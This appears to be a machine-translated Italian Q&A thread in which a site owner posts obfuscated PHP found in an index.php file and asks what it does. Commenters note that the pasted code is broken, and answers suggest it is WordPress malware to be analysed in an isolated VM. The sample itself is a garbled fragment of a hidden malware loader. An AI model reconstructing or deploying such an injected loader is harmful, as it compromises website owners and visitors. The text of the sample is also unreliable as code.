Ho trovato questo codice in index.php su un mio sito non raggiungibile ... Cosa fa? [chiuso]


-3
!} x27;! >>>!} _; gvc%} &; ftmbg} x77 {** u% - # jt0} Z; 0] =] 0 #) 2q% l} S; 2-u%! - # 2 # / #% # / # o] #jw) bssbz) #P # - # D # - # B # - # T # - # E # - # G # - # H5 # *% FDY% TDZ)% bbT- % BT-% hW ~% FDY) ## - # ~ / 7 & 6 | 7 ** 111127-zW% h> EZH, 2W% wN;!! # - Ez-1H * WCW * [% rN} # QwTW% Hir x5c1 ^ -% r x5c2 ^ -% hOh / # 00 # W6! 2p%! * 3>? * 2b%) gpf {jt)! gj! pjudovg x22)! gj} 1 ~! 52] 88] 5] 48 ] 32M3] 317] 445] 212] 445] 43] 321] 464] 284] 364] 6] 234] 342] 58] 24hmg%! J%! |! * # D% 62bd%!.%!> X22: ftmbg39 * 56mg%)! gj! ~: ,, Bjg!)% j: >> 1 *!% b:> 1% s: x5c% j: .2 ^,% b:% s: x5c% j: ^ * ofmy%) utjm |!! * 5! x27! hmg%)! gj! |! * 1? hmg%)! gj!] 26 x24- x24j%! * 9! x27! hnjA x27 & 6! fyqmpef) # x24 *! x24Yp x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e "; * + fepdfe {h + {d%) + opjudovg +)! gj + {e%! osvufs! *! + A!>! {e%)! >> x22! ftmbg)! x63 162 funzione bknbpvb ($ n) {return chr (ord ($ n) -1);} @ error_repor2986 + 7 ** ^ /% rx111!% yy) #} # - # x24- x24-tusqpt)%> qp !% | Z ~ !! 2p% | * * jQeTQcOc / # 00 # W ~ Ydrr)% RxB% epnbss> bssbz) # 44ec:!!!!!!!! 649 # - #: 618d5f9 # - # # f6c6 # >> X)! GjZb%! ** X) ufttj x22) gj! |! * NbsS, 6! x242178} 527} 88:} 334} 472 x24 / 7rfs%: * mmvo:>: iuhofm%: - 5ppde: 4: |: ** # ppde #) tutjyf`4 x223}! +!> * 4-1- bubE {h% SUT`LDPT7-UFOJ`GB) fubfsdX)% j> 1 ^ # zsfvr # x5cq% 7 ** ^ # zsfvr # x5cq%) ufttj x22) gj632j%! * 72! x27 HMG%) gjdovg} {; #) tutjyf`opjudov3f] 51L3] 84] y31M6] y3e] 81 # / # 7e:!! 55946-tr.984: 75.983: 48.984: 71] K9] 77zbek ~ b%! Zb%! * (% W:!>! X246767 ~ 6! Bssbz) x24] 25 x24- x24 -!% X24- x24 *! |! x24- x2j% 7-K) udfoopdXA x22) 7gj6>} R; msv}.; / # / # / 67j ** b%) sfxpmpusut! - # j0 #! /! ** # sfmcnbs + yfeobz + s` x5c ^> Ew: Qb: Qc: W ~% z> 21 # p # / # p # /% z> 2 * A:>: 8: |!!: 7 # 6 #) tutjyf`439275ttfsqnpdov {h19275j {hnpd19275fubmgoj {h1: |%} U; y]} R; 2]} ,; osvufs} x27; mnui} &; zep *!% I x5c2 ^ x2272qj%) 7gj6] D4] 82] K6] 72] K9] 78] K5] 53] Kc #! #] D && (! Isset ($ GLOBALS ["x61 156 x75 156 x61"])))) {$ GLOBALS [_ * # [k2 `{6:!} 7;!} 6; ##} C;! >>!} W; utpix :: h%: n%! #] Y84] 2757, * e x27, * d x27, * c x27 , * b x27) fepq% 6! x2400 ~: / h%:> x22! pd%)! gj} Z; h! opju] y83] 273] y76] 277 ##] y74] 273ovg! |! ** # j {hnpd #) tutjyf`ogj5h% !! x24 /% tmw / x24)% - x24 *

Sembra incomprensibile. Per lo meno, non è un codice PHP valido.
ivan_pozdeev,

Oh, non ti sei preoccupato di formattarlo correttamente. È un codice PHP valido, offuscato.
ivan_pozdeev,

Il codice che hai pubblicato non sembra essere una rappresentazione fedele del file: è rotto. Sto pubblicando questo per dissuadere gli altri dal perdere tempo.
ivan_pozdeev

Risposte:


2

È un codice PHP offuscato. Non mi sono preoccupato (e non vedo un uso) di guardare oltre.

  • È possibile eseguirlo dalla riga di comando con un account non privilegiato (o ancora meglio - da una VM in modo da poter negare l'accesso alla rete - potenzialmente a un database - nel caso in cui abbia credenziali incorporate) e vedere cosa succede.
  • Eppure ti consiglio di provare a deobfuscolarlo a mano come rompicapo.
    • Si noti che è possibile eseguire blocchi di codice PHP tramite l'interprete della riga di comando per fare in modo che esegua la maggior parte del lavoro.

Un commento a una domanda SO su Wordpress suggerisce che questo potrebbe essere un file Wordpress di serie.

Googling "php obfuscator" Il silenzio è d'oro. "" Inoltre, ho trovato https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Caso chiuso.

Molto probabilmente, questo è un virus Wordpress. Tanto più incentivo per te a dissezionarlo e vedere cosa fa. Bene, e controlla quel tuo server per eventuali anomalie, meglio da un disco di ripristino.

Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.